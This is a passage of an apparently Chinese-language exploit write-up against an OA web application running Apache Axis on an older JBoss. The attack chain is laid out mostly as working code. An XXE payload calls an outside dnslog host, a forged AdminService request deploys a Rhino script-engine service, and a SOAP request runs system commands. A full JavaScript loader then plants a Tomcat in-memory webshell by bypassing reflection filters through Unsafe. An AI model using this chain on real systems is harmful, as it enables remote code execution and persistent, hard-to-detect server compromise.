&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM <span class=hljs-string>"http://123.6x9ryk.dnslog.cn"</span>&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=20>因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd</p>
<pre blockindex=21><code class="hljs language-xml"><span class=hljs-tag>&lt;<span class=hljs-name>service</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"AdminService"</span> <span class=hljs-attr>provider</span>=<span class=hljs-string>"java:MSG"</span>&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"allowedMethods"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"AdminService"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"enableRemoteAdmin"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"false"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>parameter</span> <span class=hljs-attr>name</span>=<span class=hljs-string>"className"</span> <span class=hljs-attr>value</span>=<span class=hljs-string>"org.apache.axis.utils.Admin"</span>/&gt;</span>
<span class=hljs-tag>&lt;<span class=hljs-name>namespace</span>&gt;</span>http://xml.apache.org/axis/wsdd/<span class=hljs-tag>&lt;/<span class=hljs-name>namespace</span>&gt;</span>
<span class=hljs-tag>&lt;/<span class=hljs-name>service</span>&gt;</span>
</code></pre>
<p blockindex=22>那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService</p>
<pre blockindex=23><code class="hljs language-xml">http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
</code></pre>
<p blockindex=24><img src="data:image/png;base64,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
<p blockindex=25>部署成功</p>
<pre blockindex=26><code class="hljs language-php">POST /defaultroot/services/./RhinoScriptEngineService HTTP/<span class=hljs-number>1.1</span>
Host:
User-Agent: Moziilla/<span class=hljs-number>5.0</span> (Linux; U; Android <span class=hljs-number>2.3</span>.<span class=hljs-number>6</span>; en-us; Nexus S Build/GRK39F) AppleWebKit/<span class=hljs-number>533.1</span> (KHTML, like Gecko) Version/<span class=hljs-number>4.0</span> Mobile Safari/<span class=hljs-number>533.1</span>
Content-Type: text/xml;charset=UTF-<span class=hljs-number>8</span>
SOAPAction:
Content-Length: <span class=hljs-number>973</span>
&lt;soapenv:Envelope xmlns:xsi=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema-instance"</span> xmlns:xsd=<span class=hljs-string>"http://www.w3.org/2001/XMLSchema"</span> xmlns:soapenv=<span class=hljs-string>"http://schemas.xmlsoap.org/soap/envelope/"</span> xmlns:jav=<span class=hljs-string>"http://javascript.script.sun.com"</span>&gt;
&lt;soapenv:Body&gt;
&lt;<span class=hljs-keyword>eval</span> xmlns=<span class=hljs-string>"http://127.0.0.1:8080/services/scriptEngine"</span>&gt;
&lt;arg0 xmlns=<span class=hljs-string>""</span>&gt;
&lt;![CDATA[
<span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
<span class=hljs-keyword>var</span> command = <span class=hljs-string>"cmd /c whoami"</span>;
<span class=hljs-keyword>var</span> pb = <span class=hljs-keyword>new</span> java.lang.ProcessBuilder(Arrays.asList(command.split(<span class=hljs-string>" "</span>)));
<span class=hljs-keyword>var</span> process = pb.start();
<span class=hljs-keyword>var</span> ret = <span class=hljs-keyword>new</span> java.util.Scanner(process.getInputStream()).useDelimiter(<span class=hljs-string>'\\A'</span>).next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns=<span class=hljs-string>""</span> xsi:type=<span class=hljs-string>"urn:SimpleScriptContext"</span> xmlns:urn=<span class=hljs-string>"urn:beanservice"</span>&gt;
&lt;/arg1&gt;
&lt;/<span class=hljs-keyword>eval</span>&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
</code></pre>
<p blockindex=27><img src=data:image/png;base64,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
<p blockindex=28>成功执行命令</p>
<h3 blockindex=29>内存马</h3>
<p blockindex=30>Java-Js-Engine-Payloads<a href=https://github.com/yzddmr6/Java-Js-Engine-Payloads>https://github.com/yzddmr6/Java-Js-Engine-Payloads</a></p>
<p blockindex=31>适配了JDK6-14的内存马</p>
<pre blockindex=32><code class="hljs language-java"><span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:mozilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
<span class=hljs-function>function <span class=hljs-title>getUnsafe</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> theUnsafeMethod =
java.lang.Class.forName(<span class=hljs-string>"sun.misc.Unsafe"</span>).getDeclaredField(<span class=hljs-string>"theUnsafe"</span>);
theUnsafeMethod.setAccessible(<span class=hljs-keyword>true</span>);
<span class=hljs-keyword>return</span> theUnsafeMethod.get(<span class=hljs-keyword>null</span>);
}
<span class=hljs-function>function <span class=hljs-title>removeClassCache</span><span class=hljs-params>(clazz)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>)
.getResourceAsStream(<span class=hljs-string>"Class.class"</span>)
.readAllBytes(),
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> reflectionDataField =
clazzAnonymousClass.getDeclaredField(<span class=hljs-string>"reflectionData"</span>);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), <span class=hljs-keyword>null</span>);
}
<span class=hljs-function>function <span class=hljs-title>bypassReflectionFilter</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>var</span> reflectionClass;
<span class=hljs-keyword>try</span> {
reflectionClass = java.lang.Class.forName(
<span class=hljs-string>"jdk.internal.reflect.Reflection"</span>
);
} <span class=hljs-keyword>catch</span> (error) {
reflectionClass = java.lang.Class.forName(<span class=hljs-string>"sun.reflect.Reflection"</span>);
}
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> classBuffer = reflectionClass
.getResourceAsStream(<span class=hljs-string>"Reflection.class"</span>)
.readAllBytes();
<span class=hljs-keyword>var</span> reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
<span class=hljs-keyword>null</span>
);
<span class=hljs-keyword>var</span> fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"fieldFilterMap"</span>);
<span class=hljs-keyword>var</span> methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(<span class=hljs-string>"methodFilterMap"</span>);
<span class=hljs-keyword>if</span> (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
<span class=hljs-keyword>if</span> (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(<span class=hljs-string>"java.util.HashMap"</span>)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(<span class=hljs-string>"java.lang.Class"</span>));
}
<span class=hljs-function>function <span class=hljs-title>setAccessible</span><span class=hljs-params>(accessibleObject)</span> </span>{
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> overrideField = java.lang.Class.forName(
<span class=hljs-string>"java.lang.reflect.AccessibleObject"</span>
).getDeclaredField(<span class=hljs-string>"override"</span>);
<span class=hljs-keyword>var</span> offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, <span class=hljs-keyword>true</span>);
}
<span class=hljs-function>function <span class=hljs-title>defineClass</span><span class=hljs-params>(bytes)</span> </span>{
<span class=hljs-keyword>var</span> clz = <span class=hljs-keyword>null</span>;
<span class=hljs-keyword>var</span> version = java.lang.System.getProperty(<span class=hljs-string>"java.version"</span>);
<span class=hljs-keyword>var</span> unsafe = getUnsafe();
<span class=hljs-keyword>var</span> classLoader = <span class=hljs-keyword>new</span> java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.net.URL"</span>),
<span class=hljs-number>0</span>
)
);
<span class=hljs-keyword>try</span> {
<span class=hljs-keyword>if</span> (version.split(<span class=hljs-string>"."</span>)[<span class=hljs-number>0</span>] &amp;gt;= <span class=hljs-number>11</span>) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
<span class=hljs-string>"java.lang.ClassLoader"</span>
).getDeclaredMethod(
<span class=hljs-string>"defineClass"</span>,
java.lang.Class.forName(<span class=hljs-string>"[B"</span>),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, <span class=hljs-number>0</span>, bytes.length);
} <span class=hljs-keyword>else</span> {
<span class=hljs-keyword>var</span> protectionDomain = <span class=hljs-keyword>new</span> java.security.ProtectionDomain(
<span class=hljs-keyword>new</span> java.security.CodeSource(
<span class=hljs-keyword>null</span>,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(<span class=hljs-string>"java.security.cert.Certificate"</span>),
<span class=hljs-number>0</span>
)
),
<span class=hljs-keyword>null</span>,
classLoader,
[]
);
clz = unsafe.defineClass(
<span class=hljs-keyword>null</span>,
bytes,
<span class=hljs-number>0</span>,
bytes.length,
classLoader,
protectionDomain
);
}
} <span class=hljs-keyword>catch</span> (error) {
error.printStackTrace();
} <span class=hljs-keyword>finally</span> {
<span class=hljs-keyword>return</span> clz;
}
}
<span class=hljs-function>function <span class=hljs-title>base64DecodeToByte</span><span class=hljs-params>(str)</span> </span>{
<span class=hljs-keyword>var</span> bt;
<span class=hljs-keyword>try</span> {
bt = java.lang.Class.forName(<span class=hljs-string>"sun.misc.BASE64Decoder"</span>).newInstance().decodeBuffer(str);
} <span class=hljs-keyword>catch</span> (e) {
bt = java.lang.Class.forName(<span class=hljs-string>"java.util.Base64"</span>).newInstance().getDecoder().decode(str);
}
<span class=hljs-keyword>return</span> bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
</code></pre>
<p blockindex=33>由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可</p>
<p blockindex=34><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAACHYAAAT0CAYAAAAAUxeUAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdd3wc1bn/8c+Z3dWqN3dZllxxARtjSmJDLi300ELCTUJNhR+Q3JvkhoSWUEMCBEhu7k3uiwAhYEoCwSYBDKEGbHqxJRvbcu+ymtXL7s75/TGzo11JNtiSsQjf9x9Y0s7Oc86Z2X0xc555jrHWsjNLliwpfeKJJ06bOuWAU8eUlY5vb28v+fvf/p47ctQopk/fn7fefJtRJSMZOXIkRUVF5Obmkp2dRU5ODuFQmNy8XBzHwRiD67qEQiESiQTGGKy1GGNwHAc3kcC1lpDj4DhOsE1yu2QbU38Ph8MkEgksEA6FsNbiui4WwN93KBTCdd2dxkfxFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFV/xFb8f8WOxGF2xOOFwiLa2Nrq6Yt7furpYv349b7/1NlOnTaWsrBxrLfMef7xl7LhxW2bOPGhNOGz+5jjOEzNmzNjETphko1PV1taWRCKR66qq1nzjb0884cTjcdrb20gkEkycNJHPfe4IJk+eDOANRDweNNwCBnBdd2cxezfCfORN/0UN/AD0PqofZ/Q980lss4iIiIiIiIiIiIiIiIgMFh8+4/hJnJP8JLb508Z1XRzHSwixgOMnQRhjsOAlgcTjbK+pZcuWLTz04ENEo1EikQwyMjIIh0Oua809WVmRn11++eVbeu6/V2JHc3PzafF4Yq615C5b9gHz582jZHQJBx44gwNnTCcvL8/LVLGWeDxOX4khu0uJHZ/6ARARERERERERERERERER6af+z12L7KldpU4kK4aEw2Ecx6GlpZWly5axfXst+fn55OXlEolkYIzTEomYc2bMmPFE2vtTEzOampq+Z625o6Ojw+no6GDx4sVUVFTwzW9+nYL8fFzXJR6PD3gHldjxqR8AEREREREREREREREREZF+UmKH7Du7UxMjmeDR1tbOsg8+ICcnl+LiYnJycgiFQm447Hw/Pz//N8ntg8SO5ubm07q64o+7rus0NTVRU7OdjIwMDth/GvF4nFgsNuAdCxrxqc9r+NQPgIiIiIiIiIiIiIiIiIhIPymxQ/adPVnsJBwOEwqFmDf/Cd55+13y8vKIRjOx4FrrnnnFFZc/AX5iR20tJaFQ44pYrCu3ubmFmprtFBUVUV5eRmdHx0D3J42SOkCJHSIiIiIiIiIiIiIiIiIi/aXEDtl39iSxA8BxHELhMG+9+Rb/fGUh2dnZZGZmEgqFWgoL8yZ/5Stf2WKstezY0XhXIuF+q7m5ierq7RQWFlA6umSvLLvSkxI7QIkdIiIiIiIiIiIiIiI